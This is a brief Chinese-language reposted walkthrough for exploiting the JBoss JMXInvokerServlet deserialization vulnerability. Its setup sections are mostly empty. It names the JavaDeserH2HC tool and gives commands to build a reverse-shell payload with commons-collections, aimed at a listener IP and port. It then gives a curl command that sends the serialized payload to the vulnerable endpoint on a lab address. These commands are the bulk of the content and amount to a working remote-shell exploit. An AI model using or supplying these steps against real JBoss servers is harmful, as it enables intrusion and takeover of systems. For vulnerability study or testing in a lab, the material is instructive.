JBoss JMXInvokerServlet 反序列化漏洞


1.搭建环境

 

 2.注解利用工具

 

 2.通用工具

工具:JavaDeserH2HC.zip

下载地址:

命令

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //监听机的ip和端口

执行命令
漏洞路径:/invoker/JMXInvokerServlet

curl http://192.168.100.188:8080//invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM